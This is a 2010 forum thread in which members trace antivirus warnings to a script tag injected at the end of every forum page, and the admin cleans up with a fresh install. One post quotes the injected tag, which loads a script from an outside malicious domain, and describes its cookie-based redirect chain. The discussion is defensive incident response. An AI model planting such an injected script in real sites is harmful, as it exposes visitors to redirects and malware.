My anti virus program keeps saying there's a virus here.

Wario Bros · May 02, 2010, 11:37:17 AM

When on get on this forums, my anti virus program keeps making a pop-up saying there is a virus threat called "HTML/ScrInject.B.Gen virus." I tell it to delete it but when I click on another section of the forums, that same warning message comes up. Is this just me or is it happening to someone else as well?

bustin98 · May 02, 2010, 11:49:13 AM

What page is doing this?

marioman · May 02, 2010, 11:51:50 AM

All of them. I just sent you a PM about this.

Revned · May 02, 2010, 11:59:59 AM

Hmm. At the very end of every page, after the </html> tag, is the following:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

which redirects to http://www3.workfree36-td.xorg.pl based on your cookies. This domain times out on me, so I can't tell what it is.

EDIT: The kdjkfjskdfjlskdjf.com site is timing out for me now, so every page on the forums tries to load forever.

bustin98 · May 02, 2010, 12:09:25 PM

Either my AntiVirus is disabling it or IE8 is. I am not having any issues with the site, but I do see the code. Working on it now. Seems like it is embeded in the code.

Revned · May 02, 2010, 12:20:23 PM

The script only does something the first time you view it. It adds a cookie, then sends you to the other site. From then on it sees that you have a cookie already and does nothing

The real question is how this is happening in the first place. It's not being appended with JavaScript, because it's there even if I get the page with plain old wget. This sounds almost like they somehow edited the site's PHP source :-S

EDIT: Alright, everyone is safe. The site it redirects you to further redirects you to "QoogleSearch.com", which has been de-listed:

Domain Name: QOOGLESEARCH.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Status: ok
Updated Date: 27-apr-2010
Creation Date: 21-jan-2010
Expiration Date: 21-jan-2011

Peardian · May 02, 2010, 02:11:06 PM

That's the infection I was talking about. And it looks like the script is still there at the bottom of the page. The site gives you a virus, or it did before it was shut down.

bustin98 · May 02, 2010, 02:15:03 PM

I overwrote the source code with the original files, hence the current lack of ads at the footer. No luck in removing it though. Currently creating a new directory with a completely fresh install, importing the DB now.

EDIT: Ok, everything is switched over to a completely fresh install with the old DB imported in. Anyone see anything off? Let me know.

Wario Bros · May 02, 2010, 03:30:36 PM

That's good to hear! BTW, I no longer get that virus message anymore. I'm kinda surprised how fast this was handled.

Revned · May 02, 2010, 03:36:35 PM

Did you save the infected files for further inspection? This might just happen again if you don't find the cause.

bustin98 · May 02, 2010, 03:38:12 PM

Doesn't seem fast to me... 4 hours of trying stuff just to let it come down to a fresh install. Still will be looking at the old files to see if I can't find what was changed in case it happens again.

EDIT: We are thinking the same.

Maxim · May 03, 2010, 01:34:48 AM

If you have any files or directories that are world-writeable then other people on your shared server can drop files or add exploits. Also, any vulnerabilities in the forum will get you targeted, the best mitigation being to make some non-standard modifications (e.g. moving form fields around, hiding the version number) to make it harder to script and/or Google for.

(I've had to deal with these kinds of problems for a while... the only real solution is to run custom software, on a private server, and either not be big enough to get targeted or have really robust software. Also, daily backups of the files and DB.)

Maxim · May 03, 2010, 01:38:17 AM

Also, some of the attachments/avatars have been corrupted. My avatar has had two bytes removed, for example.

bustin98 · May 03, 2010, 10:50:31 AM

Sorry Maxim. It doesn't look like I can do anything about the avatars. You'll have to reload it back up.

Revned · May 03, 2010, 11:43:46 AM

Not that avatars are a chief concern, but don't you have backups? My avatar and several others' have disappeared, and it makes me concerned that other things might be corrupted.